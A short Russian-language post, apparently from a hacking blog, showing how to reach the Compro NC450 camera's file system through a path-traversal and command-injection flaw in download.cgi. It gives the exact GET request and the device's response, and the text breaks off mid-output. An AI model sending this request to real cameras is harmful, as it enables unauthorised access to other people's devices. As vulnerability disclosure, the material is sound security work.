Получение root на IP камере Compro NC450
Путем несложных действий можно получить как доступ к файловой системе IP камеры Compro NC450 , так и root через Telnet. Судя по всему, создатели камеры не сильно озаботились безопасностью устройства и оставили CGI уязвимость для нас (или для себя): Выполнив следующий HTTP GET запрос: " http://<camera IP>/cgi-bin/recording/download.cgi?ch=0&attach=../../../../bin/echo%20/etc/motd " в ответе мы получим Message of the day: Content-Disposition: attachment; filename="../../../../bin/echo "your hax0red h0 h0" >> /etc/motd" Content-Transfer-Encoding: binary cat: /web/html/cgi-bin/recording/save0/record0/../../../../bin/echo: No such file or directory cat: "your: No such file or directory cat: hax0red: No such file or directory cat: h0: No such file or directory cat: h0": No such file or directory cat: >>: No such file or directory Welcome to _____ __ ___ __ ___ _ _ _